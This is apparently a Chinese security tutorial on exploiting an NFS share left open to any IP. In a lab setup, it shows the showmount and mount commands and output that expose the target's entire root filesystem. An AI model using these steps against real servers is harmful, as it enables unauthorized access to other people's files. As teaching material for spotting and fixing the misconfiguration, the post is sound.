nsf未授权访问漏洞

服务简介

Network File System(NFS)，网络文件系统，是由SUN公司研制的UNIX表示层协议(presentation layer protocol)，能使使用者访问网络上别处的文件就像在使用自己的计算机一样。nfs最初只支持UDP协议，在新版本中支持TCP和UDP协议，默认监听端口为2049。

产生原因

未设置可访问IP

漏洞利用

#查看服务器共享的目录
root@kali:~# showmount -e 192.168.83.99
Export list for 192.168.83.99:
/ *

#挂载目录到本地
root@kali:/usr/local/vulhub/couchdb/unauth# ls /mnt
root@kali:/usr/local/vulhub/couchdb/unauth# mount -t nfs 192.168.83.99:/ /mnt
root@kali:/usr/local/vulhub/couchdb/unauth# ls /mnt
bin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
root@kali:/usr/local/vulhub/couchdb/unauth# 

#卸载目录
umount /mnt

您可能感兴趣的文章

• CouchDB未授权访问漏洞
• memcache未授权访问
• VNC未授权访问漏洞
• Redis 未授权访问漏洞
• Docker Remote API未授权访问漏洞
• rsync未授权访问漏洞